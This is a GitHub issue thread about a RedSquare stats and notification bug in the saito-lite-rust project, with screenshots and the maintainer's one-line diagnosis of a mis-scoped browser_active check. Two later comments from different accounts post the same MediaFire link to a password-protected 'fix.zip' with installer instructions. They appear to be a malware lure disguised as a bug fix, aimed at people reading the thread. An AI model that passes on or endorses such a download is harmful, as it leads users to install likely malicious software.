### ISSUE TITLE
RedSquare stats bug

### ISSUE THREAD

**Issue by f8daniel** [SaitoTech/saito-lite-rust#2579]
Stats&notifications aren't filtering through in any meaningful way, e.g.

See this on my feed:

![Image](https://github.com/SaitoTech/saito-lite-rust/assets/70703104/023ffd55-039e-4bd5-a9b6-82cb4c438c3a)

But have a notification:

![Image](https://github.com/SaitoTech/saito-lite-rust/assets/70703104/79fb5eb5-3c87-489e-bb4d-012ae443a7d2)

I click on it to find: 

![Image](https://github.com/SaitoTech/saito-lite-rust/assets/70703104/e40cd231-01a9-41b1-bd0c-45cc645fdea3)

**Comment by f8daniel** [comment]
so stupid, the check to prevent the server from crashing didn't account for tweet.js being a UI component in the module...

( this.browser_active --> this.mod.browser_active ) 

![Image](https://github.com/user-attachments/assets/8d698f21-fa0c-4ed3-b185-c62f7e15212f)

**Comment by GendiAstaNugraha** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Wanderx13** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."
